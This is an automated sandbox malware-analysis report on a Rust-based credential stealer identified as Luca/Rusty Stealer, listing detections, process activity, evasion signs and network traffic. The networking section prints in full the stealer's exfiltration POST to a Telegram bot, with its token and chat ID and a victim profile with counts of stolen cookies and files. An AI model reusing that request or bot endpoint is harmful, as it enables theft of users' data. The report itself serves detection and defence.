Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cOQD62FceM.exe

Overview

General Information

Sample name:cOQD62FceM.exe
renamed because original name is a hash value
Original sample name:17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd.exe
Analysis ID:1450352
MD5:af412b399914b80044340ade572bf2ab
SHA1:448557087815068ea337905a61f83f02eee47c07
SHA256:17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd
Tags:exeRustyStealer
Infos:

Detection

Luca Stealer, Rusty Stealer
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
Yara detected Rusty Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • cOQD62FceM.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\cOQD62FceM.exe" MD5: AF412B399914B80044340ADE572BF2AB)
    • powershell.exe (PID: 2352 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
cOQD62FceM.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
      Process Memory Space: cOQD62FceM.exe PID: 6176JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        Process Memory Space: cOQD62FceM.exe PID: 6176JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: cOQD62FceM.exe PID: 6176JoeSecurity_RustyStealerYara detected Rusty StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.cOQD62FceM.exe.7ff747670000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

              Sigma Signatures

              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cOQD62FceM.exe", ParentImage: C:\Users\user\Desktop\cOQD62FceM.exe, ParentProcessId: 6176, ParentProcessName: cOQD62FceM.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 2352, ProcessName: powershell.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: cOQD62FceM.exeAvira: detected
              Multi AV Scanner detection for submitted file
              Source: cOQD62FceM.exeReversingLabs: Detection: 50%
              Source: cOQD62FceM.exeVirustotal: Detection: 54%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 71.0% probability
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: cOQD62FceM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: Glmp.pdb~ source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: lmp.pdb source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\* source: cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*60\* source: cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior

              Networking

              barindex
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20E26RT4853%20(1280,%201024)%0AHWID:%205059308222394286%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\cOQD62FceM.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489acontent-length: 980180accept: */*host: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: ipwho.is
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
              Source: global trafficDNS traffic detected: DNS query: ipwho.is
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20E26RT4853%20(1280,%201024)%0AHWID:%205059308222394286%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\cOQD62FceM.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489acontent-length: 980180accept: */*host: api.telegram.org
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=
              Source: cOQD62FceM.exe, 00000000.00000003.2590558371.00000190BA826000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606869052.00000190BA826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
              Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svg%
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: cOQD62FceM.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: cOQD62FceM.exeBinary string: \Device\Afd\Mio
              Source: cOQD62FceM.exeBinary string: Failed to open \Device\Afd\Mio: `
              Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@4/14@2/2
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile created: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Jump to behavior
              Source: cOQD62FceM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\cOQD62FceM.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\cOQD62FceM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: cOQD62FceM.exe, 00000000.00000003.2496329250.00000190B8AE9000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497256894.00000190BA832000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT Name,CurrentHorizontalResolution, CurrentVerticalResolution FROM Win32_VideoControlleres;C:\Wind
              Source: cOQD62FceM.exeReversingLabs: Detection: 50%
              Source: cOQD62FceM.exeVirustotal: Detection: 54%
              Source: unknownProcess created: C:\Users\user\Desktop\cOQD62FceM.exe "C:\Users\user\Desktop\cOQD62FceM.exe"
              Source: C:\Users\user\Desktop\cOQD62FceM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\cOQD62FceM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: cOQD62FceM.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
